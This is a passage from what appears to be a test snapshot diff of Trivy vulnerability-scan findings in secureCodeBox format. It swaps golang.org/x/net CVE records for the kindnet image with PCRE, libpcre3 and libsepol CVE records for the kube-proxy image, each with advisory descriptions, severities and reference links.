"Vulnerability", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-33194", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33194", - "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", - "https://go.dev/cl/311090", - "https://go.dev/issue/46288", - "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", - "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", - "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", - "https://pkg.go.dev/vuln/GO-2021-0238", - "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: x/net/html: infinite loop in ParseFragment", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33194", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33194", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - }, - { - "type": "URL", - "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://go.dev/cl/311090", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://go.dev/issue/46288", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0238", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", + "references": [ + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", + ], + }, + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", + "references": [ + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", + ], + }, + "category": "Vulnerability", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.pcre.org/original/changelog.txt", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ { "type": 